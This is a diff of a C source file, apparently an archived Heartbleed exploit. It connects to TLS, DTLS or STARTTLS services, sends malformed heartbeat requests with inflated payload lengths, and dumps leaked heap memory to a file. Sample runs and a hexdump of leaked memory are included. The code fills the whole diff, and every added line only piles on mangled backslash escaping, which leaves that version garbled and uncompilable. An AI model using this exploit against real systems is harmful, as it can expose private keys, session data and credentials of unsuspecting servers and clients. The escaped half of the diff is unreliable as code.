-		{"precmd", 1, 0, 'c'},
+		{\\\"precmd\\\", 1, 0, \\\'c\\\'},
-		{"loop", 0, 0, 'l'},
+		{\\\"loop\\\", 0, 0, \\\'l\\\'},
-		{"help", 0, 0,'h'}
+		{\\\"help\\\", 0, 0,\\\'h\\\'}
        };
 	while(userc != -1) {
-	        userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);	
+	        userc = getopt_long(argc,argv,\\\"s:p:f:t:b:c:lvh\\\",options,&index);	
        	switch(userc) {
               		case -1:
 	                        break;
-        	        case 's':
+        	        case \\\'s\\\':
 				if(ihost==0){
 					ihost = 1;
 					h = gethostbyname(optarg);				
 					if(h==NULL){
-						printf("[!] FATAL: unknown host '%s'\n",optarg);
+						printf(\\\"[!] FATAL: unknown host \\\'%s\\\'\\\\n\\\",optarg);
 						exit(1);
 					}
 					host = malloc(strlen(optarg) + 1);
 					if(host==NULL){
-                				printf("[ error in malloc()\n");
+                				printf(\\\"[ error in malloc()\\\\n\\\");
 				                exit(0);
        				}
-					sprintf(host,"%s",optarg);
+					sprintf(host,\\\"%s\\\",optarg);
               			}
 				break;
-	                case 'p':
+	                case \\\'p\\\':
 				if(iport==0){
 					port = atoi(optarg);
 					iport = 1;
 				}
                	        break;
-			case 'f':
+			case \\\'f\\\':
 				if(ifile==0){
 					file = malloc(strlen(optarg) + 1);
 					if(file==NULL){
-				                printf("[ error in malloc()\n");
+				                printf(\\\"[ error in malloc()\\\\n\\\");
                				exit(0);
        				}
-					sprintf(file,"%s",optarg);
+					sprintf(file,\\\"%s\\\",optarg);
 					ifile = 1;
 				}
 				break;
-			case 't':
+			case \\\'t\\\':
 				if(itype==0){
 					type = atoi(optarg);
 					itype = 1;
 				}
 				break;
-			case 'h':
+			case \\\'h\\\':
 				usage();
 				break;
-			case 'b':
+			case \\\'b\\\':
 				if(ihost==0){
 					ihost = 1;
 					host = malloc(strlen(optarg)+1);
 					if(host==NULL){
-			 	                printf("[ error in malloc()\n");
+			 	                printf(\\\"[ error in malloc()\\\\n\\\");
 				                exit(0);
 				        }
-					sprintf(host,"%s",optarg);
+					sprintf(host,\\\"%s\\\",optarg);
 					bind = 1;
 				}
 				break;
-			case 'c':
+			case \\\'c\\\':
 				if(iprecmd == 0){
 					iprecmd = 1;
 					precmd = atoi(optarg);
 				}
 				break;
-			case 'v':
+			case \\\'v\\\':
 				verbose = 1;
 				break;
-			case 'l':
+			case \\\'l\\\':
 				loop = 1;
 				break;
 			default:
@ -620,7 +620,7 @@ int main(int argc, char* argv[]){
 		}
 	}
 	if(ihost==0||iport==0||ifile==0||itype==0||type < 0){
-		printf("[ try --help\n");
+		printf(\\\"[ try --help\\\\n\\\");
 		exit(0);
 	}
 	ssl_init();
@ -633,7 +633,7 @@ int main(int argc, char* argv[]){
 			sneakyleaky(c,file,verbose);
 		}
 		while(loop==1){
-			printf("[ entered heartbleed loop\n");
+			printf(\\\"[ entered heartbleed loop\\\\n\\\");
 			first=0;
 			repeat=1;
 			heartbleed(c,type);
@ -641,7 +641,7 @@ int main(int argc, char* argv[]){
 				sneakyleaky(c,file,verbose);
 			}
 		}
-		printf("[ done.\n");
+		printf(\\\"[ done.\\\\n\\\");
 		exit(0);
 	}
 	else{
@ -650,7 +650,7 @@ int main(int argc, char* argv[]){
 		while(1){
      			sd=accept(ret,0,0);
 			if(sd==-1){
-				printf("[!] FATAL: problem with accept()\n");
+				printf(\\\"[!] FATAL: problem with accept()\\\\n\\\");
 				exit(0);
 			}
 			if(pid=fork()){
@ -664,7 +664,7 @@ int main(int argc, char* argv[]){
 					sneakyleaky(c,file,verbose);
 				}
 				while(loop==1){
-					printf("[ entered heartbleed loop\n");
+					printf(\\\"[ entered heartbleed loop\\\\n\\\");
 					first=0;
 					repeat=0;
 					heartbleed(c,type);
@ -672,7 +672,7 @@ int main(int argc, char* argv[]){
 						sneakyleaky(c,file,verbose);
 					}
 				}
-				printf("[ done.\n");
+				printf(\\\"[ done.\\\\n\\\");
 				exit(0);
 			}
 		}
--- a/platforms/multiple/remote/32998.c
+++ b/platforms/multiple/remote/32998.c
@ -16,7 +16,7 @@
 * and can be run in a loop until the connected peer ends connection.
 * The data leaked contains 16 bytes of random padding at the end.
 * The exploit can be used against a connecting client or server,
-* it can also send pre_cmd's to plain-text services to establish
+* it can also send pre_cmd\\\'s to plain-text services to establish
 * an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
 * will often forcefully close the connection during large leak
 * requests so try to lower your payload request size. 
@ -35,23 +35,23 @@
 * [ decrypting SSL packet
 * [ heartbleed leaked length=65535
 * [ final record type=24, length=16384
-* [ wrote 16381 bytes of heap to file 'out'
+* [ wrote 16381 bytes of heap to file \\\'out\\\'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
-* [ wrote 16384 bytes of heap to file 'out'
+* [ wrote 16384 bytes of heap to file \\\'out\\\'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
-* [ wrote 16384 bytes of heap to file 'out'
+* [ wrote 16384 bytes of heap to file \\\'out\\\'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
-* [ wrote 16384 bytes of heap to file 'out'
+* [ wrote 16384 bytes of heap to file \\\'out\\\'
 * [ heartbeat returned type=24 length=42
 * [ decrypting SSL packet
 * [ final record type=24, length=18
-* [ wrote 18 bytes of heap to file 'out'
+* [ wrote 18 bytes of heap to file \\\'out\\\'
 * [ done.
 * $ ls -al out
 * -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
@ -60,11 +60,11 @@
 *
 * Use following example command to generate certificates for clients.
 *
-* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
+* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\\
 * -keyout server.key -out server.crt
 *
-* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
+* Debian compile with \\\"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\\
-* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" 
+* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\\\" 
 *
 * todo: add udp/dtls support.
 *
@ -87,7 +87,7 @@
 * [ decrypting SSL packet
 * [ heartbleed leaked length=1336
 * [ final record type=24, length=1355
-* [ wrote 1352 bytes of heap to file 'eshta'
+* [ wrote 1352 bytes of heap to file \\\'eshta\\\'
 * 
 * 
 * # hexdump -C eshta 
@ -120,20 +120,20 @@
 * [ decrypting SSL packet
 * [ heartbleed leaked length=1336
 * [ final record type=24, length=1355
-* [ wrote 1352 bytes of heap to file 'eshta'
+* [ wrote 1352 bytes of heap to file \\\'eshta\\\'
 * 
 * 
 * # hexdump -C eshta 
 * 00000000  00 00 24 4e b7 00 00 00  00 00 00 00 00 18 00 00  |..$N............|
-* 00000010  cf d0 5f df c3 64 5f 58  79 17 f8 f7 22 9b 28 6e  |.._..d_Xy...".(n|
+* 00000010  cf d0 5f df c3 64 5f 58  79 17 f8 f7 22 9b 28 6e  |.._..d_Xy...\\\".(n|
 * 00000020  c0 e7 d6 a3 08 08 08 08  08 08 08 08 08 9b c3 38  |...............8|
 * 00000030  2b 32 5f dd 3a d5 0f 83  51 02 2f 70 33 8f cf 82  |+2_.:...Q./p3...|
-* 00000040  21 5b cc 25 80 26 f3 29  c8 90 91 ec 5c 83 68 ee  |![.%.&.)....\.h.|
+* 00000040  21 5b cc 25 80 26 f3 29  c8 90 91 ec 5c 83 68 ee  |![.%.&.)....\\\\.h.|
 * 00000050  6b 11 0d ad f1 f4 da 9e  13 59 8f 2a 74 f6 d4 35  |k........Y.*t..5|
 * 00000060  9e 17 12 7c 2b 6f 9e a8  1e b4 7a 3c a5 ec 18 e0  |...|+o....z<....|
 * 00000070  44 b2 51 e4 69 8c 47 29  39 fb 9e b0 dd 5b 05 4d  |D.Q.i.G)9....[.M|
 * 00000080  db 11 06 7b 1d 08 58 60  ac 34 3f 2d d1 14 c1 b7  |...{..X`.4?-....|
-* 00000090  d5 08 59 73 16 28 f8 75  23 f7 85 27 48 be 1f 14  |..Ys.(.u#..'H...|
+* 00000090  d5 08 59 73 16 28 f8 75  23 f7 85 27 48 be 1f 14  |..Ys.(.u#..\\\'H...|
 * 000000a0  fe ff 00 00 00 00 00 00  00 04 00 01 01 16 fe ff  |................|
 * 000000b0  00 01 00 00 00 00 00 00  00 40 62 1c 02 19 45 5f  |.........@b...E_|
 * 000000c0  2c a6 89 95 d2 bf 16 c4  8b b7 14 00 00 0c 00 04  |,...............|
@ -142,20 +142,20 @@
 * 000000f0  4c 01 4b cb 86 73 03 03  03 03 2d 53 74 61 74 65  |L.K..s....-State|
 * 00000100  31 21 30 1f 06 03 55 04  0a 0c 18 49 6e 74 65 72  |1!0...U....Inter|
 * 00000110  6e 65 74 20 57 69 64 67  69 74 73 20 50 74 79 20  |net Widgits Pty |
-* 00000120  4c 74 64 30 82 01 22 30  0d 06 09 2a 86 48 86 f7  |Ltd0.."0...*.H..|
+* 00000120  4c 74 64 30 82 01 22 30  0d 06 09 2a 86 48 86 f7  |Ltd0..\\\"0...*.H..|
 * 00000130  0d 01 01 01 05 00 03 82  01 0f 00 30 82 01 0a 02  |...........0....|
 * 00000140  82 01 01 00 c0 85 26 4a  9d cd f8 5e 46 74 fa 89  |......&J...^Ft..|
 * 00000150  e3 7d 58 76 23 ba ba dc  b1 35 98 35 a5 ba 53 a1  |.}Xv#....5.5..S.|
 * 00000160  5b 37 28 fe f7 d0 02 fc  fd c9 e3 b1 ee e6 fe 79  |[7(............y|
-* 00000170  86 f8 81 1a 29 29 a9 81  95 1c c9 5c 81 a2 e8 0c  |....)).....\....|
+* 00000170  86 f8 81 1a 29 29 a9 81  95 1c c9 5c 81 a2 e8 0c  |....)).....\\\\....|
 * 00000180  35 b7 cb 67 8a ec 2a d1  73 e6 70 78 53 c8 50 91  |5..g..*.s.pxS.P.|
 * 00000190  49 07 db e1 a4 08 7b fb  07 54 48 85 45 c2 38 71  |I.....{..TH.E.8q|
 * 000001a0  6a 8a f2 4d a7 ba 1a 86  36 a2 ae bb a1 e1 7c 2c  |j..M....6.....|,|
 * 000001b0  12 04 ce e5 d1 75 24 94  1c 31 2c 46 b7 76 30 3a  |.....u$..1,F.v0:|
 * 000001c0  04 79 2f b3 65 74 fb ae  c7 10 a5 da a8 2d b6 fd  |.y/.et.......-..|
 * 000001d0  cf f9 11 fe 38 cd 25 7e  13 75 14 1d 58 92 bb 3f  |....8.%~.u..X..?|
-* 000001e0  8f 75 d5 52 f7 27 66 ca  5d 55 4d 0a b5 71 a2 16  |.u.R.'f.]UM..q..|
+* 000001e0  8f 75 d5 52 f7 27 66 ca  5d 55 4d 0a b5 71 a2 16  |.u.R.\\\'f.]UM..q..|
-* 000001f0  3e 01 af 97 93 eb 5c 3f  e0 fa c8 61 2c a1 87 8f  |>.....\?...a,...|
+* 000001f0  3e 01 af 97 93 eb 5c 3f  e0 fa c8 61 2c a1 87 8f  |>.....\\\\?...a,...|
 * 00000200  60 d4 df 5d 9d cd 0f 34  a9 66 6c 93 d8 5f 4a 2b  |`..]...4.fl.._J+|
 * 00000210  fd 67 3a 2f 88 90 b4 e9  f5 d6 ee bb 7d 8b 1c e5  |.g:/........}...|
 * 00000220  f2 cc 4f b2 c0 dc e8 1b  4c 6e 51 c9 47 8b 6c 82  |..O.....LnQ.G.l.|
@ -168,21 +168,21 @@
 * 00000290  03 55 1d 13 04 05 30 03  01 01 ff 30 0d 06 09 2a  |.U....0....0...*|
 * 000002a0  86 48 86 f7 0d 01 01 05  05 00 03 82 01 01 00 b0  |.H..............|
 * 000002b0  8e 40 58 2d 86 32 95 11  a7 a1 64 1d fc 08 8d 87  |.@X-.2....d.....|
-* 000002c0  18 d3 5d c6 a0 bb 84 4a  50 f5 27 1c 15 4b 02 0c  |..]....JP.'..K..|
+* 000002c0  18 d3 5d c6 a0 bb 84 4a  50 f5 27 1c 15 4b 02 0c  |..]....JP.\\\'..K..|
 * 000002d0  49 1f 2d 0a 52 d3 98 6b  71 3d b9 0f 36 24 d3 77  |I.-.R..kq=..6$.w|
 * 000002e0  e0 d0 a5 50 e5 ea 2d 67  11 69 4d 45 52 97 4d 58  |...P..-g.iMER.MX|
-* 000002f0  de 22 06 02 6d 21 80 2f  0d 1c d5 d5 80 5c 8f 44  |."..m!./.....\.D|
+* 000002f0  de 22 06 02 6d 21 80 2f  0d 1c d5 d5 80 5c 8f 44  |.\\\"..m!./.....\\\\.D|
 * 00000300  1e b6 f3 41 4c dc d3 40  8d 54 ac b0 ca 8f 19 6a  |...AL..@.T.....j|
 * 00000310  4d f2 fb ad 68 5a 99 19  ca ae b2 f5 54 70 29 96  |M...hZ......Tp).|
-* 00000320  84 7e ba a9 6b 42 e6 68  32 dc 65 87 b1 b7 17 22  |.~..kB.h2.e...."|
+* 00000320  84 7e ba a9 6b 42 e6 68  32 dc 65 87 b1 b7 17 22  |.~..kB.h2.e....\\\"|
 * 00000330  e3 cc 62 97 e4 fa 64 0b  1e 70 bf e5 a2 40 e4 49  |..b...d..p...@.I|
 * 00000340  24 f9 05 3f 2e fe 7c 38  56 39 4d bd 51 63 0d 79  |$..?..|8V9M.Qc.y|
 * 00000350  85 c0 4b 1a 46 64 e0 fe  a8 87 bf c7 4d 21 cb 79  |..K.Fd......M!.y|
 * 00000360  37 e7 a6 e3 6c 3b ed 35  17 73 7a 71 c6 72 2f bb  |7...l;.5.szq.r/.|
 * 00000370  58 dc ef e9 1e a3 89 5e  70 cd 95 10 87 c1 8a 7e  |X......^p......~|
-* 00000380  e7 51 c2 22 67 66 ee 22  f9 a5 2e 31 f2 ad fc 3b  |.Q."gf."...1...;|
+* 00000380  e7 51 c2 22 67 66 ee 22  f9 a5 2e 31 f2 ad fc 3b  |.Q.\\\"gf.\\\"...1...;|
 * 00000390  98 c8 30 63 ef 74 b5 4e  c4 bd c7 a2 46 0a b8 bf  |..0c.t.N....F...|
-* 000003a0  df a8 54 0e 4f 37 d0 a5  27 a3 f3 a7 28 38 3f 16  |..T.O7..'...(8?.|
+* 000003a0  df a8 54 0e 4f 37 d0 a5  27 a3 f3 a7 28 38 3f 16  |..T.O7..\\\'...(8?.|
 * 000003b0  fe ff 00 00 00 00 00 00  00 02 00 0c 0e 00 00 00  |................|
 * 000003c0  00 02 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 * 000003d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
@ -214,9 +214,9 @@
 #include <openssl/rand.h>
 #include <openssl/buffer.h>
-#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\\
 		(((unsigned int)(c[1]))    )),c+=2)
-#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\\
 		 c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
 int first = 0;
@ -261,20 +261,20 @@ int tcp_connect(char* server,int port){
        host = gethostbyname(server);
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd==-1){
-		printf("[!] cannot create socket\n");
+		printf(\\\"[!] cannot create socket\\\\n\\\");
 		exit(0);
 	}
 	sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
        bzero(&(sa.sin_zero),8);
-	printf("[ connecting to %s %d/tcp\n",server,port);
+	printf(\\\"[ connecting to %s %d/tcp\\\\n\\\",server,port);
        ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
 	if(ret==0){
-		printf("[ connected to %s %d/tcp\n",server,port);
+		printf(\\\"[ connected to %s %d/tcp\\\\n\\\",server,port);
 	}
 	else{
-		printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
+		printf(\\\"[!] FATAL: could not connect to %s %d/tcp\\\\n\\\",server,port);
 		exit(0);
 	}
 	return sd;
@ -287,7 +287,7 @@ int tcp_bind(char* server, int port){
 	host = gethostbyname(server);
 	sd=socket(AF_INET,SOCK_STREAM,0);
 	if(sd==-1){
-    		printf("[!] cannot create socket\n");
+    		printf(\\\"[!] cannot create socket\\\\n\\\");
 		exit(0);
 	}
 	memset(&sin,0,sizeof(sin));
@ -297,7 +297,7 @@ int tcp_bind(char* server, int port){
    	setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
 	ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
 	if(ret==-1){
-		printf("[!] cannot bind socket\n");
+		printf(\\\"[!] cannot bind socket\\\\n\\\");
 		exit(0);
 	}
 	listen(sd,5);
@ -314,35 +314,35 @@ connection* dtls_server(int sd, char* server,int port){
        struct sockaddr_in sa;
 	unsigned long addr;
        if ((host = gethostbyname(server)) == NULL) {
-		perror("gethostbyname");
+		perror(\\\"gethostbyname\\\");
 		exit(1);
 	}
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd==-1){
-		printf("[!] cannot create socket\n");
+		printf(\\\"[!] cannot create socket\\\\n\\\");
 		exit(0);
 	}
 	sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
 	if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
-		perror("bind()");
+		perror(\\\"bind()\\\");
 		exit(1);
 	}
 	BIO *bio;
        if(c==NULL){
-		printf("[ error in malloc()\n");
+		printf(\\\"[ error in malloc()\\\\n\\\");
 		exit(0);
 	}
        if(buf==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	memset(buf,0,4096);
 	c = malloc(sizeof(connection));
 	if(c==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	c->socket = sd;
@ -353,10 +353,10 @@ connection* dtls_server(int sd, char* server,int port){
        if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
 	SSL_CTX_SRP_CTX_init(c->sslContext);
-	SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
+	SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
-	SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);       
+	SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);       
 	if(!SSL_CTX_check_private_key(c->sslContext)){
-		printf("[!] FATAL: private key does not match the certificate public key\n");
+		printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
 		exit(0);
 	}
 	c->sslHandle = SSL_new(c->sslContext);
@ -370,12 +370,12 @@ connection* dtls_server(int sd, char* server,int port){
        SSL_set_accept_state (c->sslHandle);
        int rc = SSL_accept(c->sslHandle);
-	printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
+	printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
 //	bytes = SSL_read(c->sslHandle, buf, 4095);
-//	printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
+//	printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
 	if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
-                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
+                printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
        }
        return c;
 }
@ -392,7 +392,7 @@ connection* tls_connect(int sd){
        connection *c;
 	c = malloc(sizeof(connection));
        if(c==NULL){
-		printf("[ error in malloc()\n");
+		printf(\\\"[ error in malloc()\\\\n\\\");
 		exit(0);
 	}
 	c->socket = sd;
@ -411,7 +411,7 @@ connection* tls_connect(int sd){
                ERR_print_errors_fp(stderr);
        if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
-                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
+                printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
        }
 	return c;
 }
@ -424,25 +424,25 @@ connection* dtls_client(int sd, char* server,int port){
 	memset((char *)&sa,0,sizeof(sa));
 	c = malloc(sizeof(connection));
        if ((host = gethostbyname(server)) == NULL) {
-		perror("gethostbyname");
+		perror(\\\"gethostbyname\\\");
 		exit(1);
 	}
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd==-1){
-		printf("[!] cannot create socket\n");
+		printf(\\\"[!] cannot create socket\\\\n\\\");
 		exit(0);
 	}
 	sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
 	if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
-		perror("connect()");
+		perror(\\\"connect()\\\");
 		exit(0);
 	}
 	BIO *bio;
        if(c==NULL){
-		printf("[ error in malloc()\n");
+		printf(\\\"[ error in malloc()\\\\n\\\");
 		exit(0);
 	}
@ -463,13 +463,13 @@ connection* dtls_client(int sd, char* server,int port){
 	BIO_ctrl_set_connected(bio, 1, &sa);
 	SSL_set_bio(c->sslHandle, bio, bio);
 	SSL_set_connect_state (c->sslHandle);
-//printf("eshta\n");
+//printf(\\\"eshta\\\\n\\\");
        if(SSL_connect(c->sslHandle)!=1) 
                ERR_print_errors_fp(stderr);
        if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
-                printf("[ warning: heartbeat extension is unsupported (try anyway), %d \n",c->sslHandle->tlsext_heartbeat);
+                printf(\\\"[ warning: heartbeat extension is unsupported (try anyway), %d \\\\n\\\",c->sslHandle->tlsext_heartbeat);
        }
 	return c;
 }
@ -480,13 +480,13 @@ connection* tls_bind(int sd){
        char* buf;
 	buf = malloc(4096);
        if(buf==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	memset(buf,0,4096);
 	c = malloc(sizeof(connection));
 	if(c==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	c->socket = sd;
@ -497,10 +497,10 @@ connection* tls_bind(int sd){
                ERR_print_errors_fp(stderr);
 	SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
 	SSL_CTX_SRP_CTX_init(c->sslContext);
-	SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
+	SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
-	SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);       
+	SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);       
 	if(!SSL_CTX_check_private_key(c->sslContext)){
-		printf("[!] FATAL: private key does not match the certificate public key\n");
+		printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
 		exit(0);
 	}
 	c->sslHandle = SSL_new(c->sslContext);
@ -509,12 +509,12 @@ connection* tls_bind(int sd){
        if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
        int rc = SSL_accept(c->sslHandle);
-	printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
+	printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
 	bytes = SSL_read(c->sslHandle, buf, 4095);
-	printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
+	printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
 	if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
-                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
+                printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
        }
        return c;
 }
@ -528,16 +528,16 @@ int pre_cmd(int sd,int precmd,int verbose){
 	char* line2;  
 	switch(precmd){
 		case 0:
-			line1 = "EHLO test\n";
+			line1 = \\\"EHLO test\\\\n\\\";
-			line2 = "STARTTLS\n";
+			line2 = \\\"STARTTLS\\\\n\\\";
 			break;
 		case 1:
-			line1 = "CAPA\n";
+			line1 = \\\"CAPA\\\\n\\\";
-			line2 = "STLS\n";
+			line2 = \\\"STLS\\\\n\\\";
 			break;
 		case 2:
-			line1 = "a001 CAPB\n";
+			line1 = \\\"a001 CAPB\\\\n\\\";
-			line2 = "a002 STARTTLS\n";
+			line2 = \\\"a002 STARTTLS\\\\n\\\";
 			break;
 		default:
 			go = 1;
@ -546,23 +546,23 @@ int pre_cmd(int sd,int precmd,int verbose){
 	if(go==0){
 		buffer = malloc(2049);
 	        if(buffer==NULL){
-                	printf("[ error in malloc()\n");
+                	printf(\\\"[ error in malloc()\\\\n\\\");
                	exit(0);
 	        }
 		memset(buffer,0,2049);
 		rc = read(sd,buffer,2048);
-		printf("[ banner: %s",buffer);
+		printf(\\\"[ banner: %s\\\",buffer);
 		send(sd,line1,strlen(line1),0);
 		memset(buffer,0,2049);
 		rc = read(sd,buffer,2048);
 		if(verbose==1){
-			printf("%s\n",buffer);
+			printf(\\\"%s\\\\n\\\",buffer);
 		}
 		send(sd,line2,strlen(line2),0);
 		memset(buffer,0,2049);
 		rc = read(sd,buffer,2048);
 		if(verbose==1){
-			printf("%s\n",buffer);
+			printf(\\\"%s\\\\n\\\",buffer);
 		}
 	}
 	return sd;
@ -573,7 +573,7 @@ void* heartbleed(connection *c,unsigned int type){
        int ret;
 	buf = OPENSSL_malloc(1 + 2);
 	if(buf==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	p = buf;
@ -586,11 +586,11 @@ void* heartbleed(connection *c,unsigned int type){
 			s2n(0xffff,p);
 			break;
 		default:
-			printf("[ setting heartbeat payload_length to %u\n",type);
+			printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
 			s2n(type,p);
 			break;
 	}
-	printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
+	printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
        ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
        OPENSSL_free(buf);
 	return c;
@ -601,9 +601,9 @@ void* dtlsheartbleed(connection *c,unsigned int type){
 	unsigned char *buf, *p;
        int ret;
 	buf = OPENSSL_malloc(1 + 2 + 16);
-	memset(buf, '\0', sizeof buf);
+	memset(buf, \\\'\\\\0\\\', sizeof buf);
 	if(buf==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	p = buf;
@ -618,12 +618,12 @@ void* dtlsheartbleed(connection *c,unsigned int type){
 			s2n(0x0538,p);
 			break;
 		default:
-			printf("[ setting heartbeat payload_length to %u\n",type);
+			printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
 			s2n(type,p);
 			break;
 	}
 	s2n(c->sslHandle->tlsext_hb_seq, p);
-	printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
+	printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
          ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);
@ -674,18 +674,18 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
                        version=(ssl_major<<8)|ssl_minor;
                        n2s(p,rr->length);
 			if(rr->type==24){
-				printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
+				printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
 				if(rr->length > 16834){
-					printf("[ error: got a malformed TLS length.\n");
+					printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
 					exit(0);
 				}
 			}
 			else{
-				printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
+				printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
 				s->packet_length=0;
 				badpackets++;
 				if(badpackets > 3){
-					printf("[ error: too many bad packets recieved\n");
+					printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
 					exit(0);
 				}
 				goto apple;
@ -696,7 +696,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
                n=ssl3_read_n(s,i,i,1);
                if (n <= 0) goto apple; 
        }
-	printf("[ decrypting SSL packet\n");
+	printf(\\\"[ decrypting SSL packet\\\\n\\\");
        s->rstate=SSL_ST_READ_HEADER; 
        rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
        rr->data=rr->input;
@ -763,11 +763,11 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
 		heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
 		first = 2;
 		leakbytes = heartbleed_len + 16;
-		printf("[ heartbleed leaked length=%u\n",heartbleed_len);
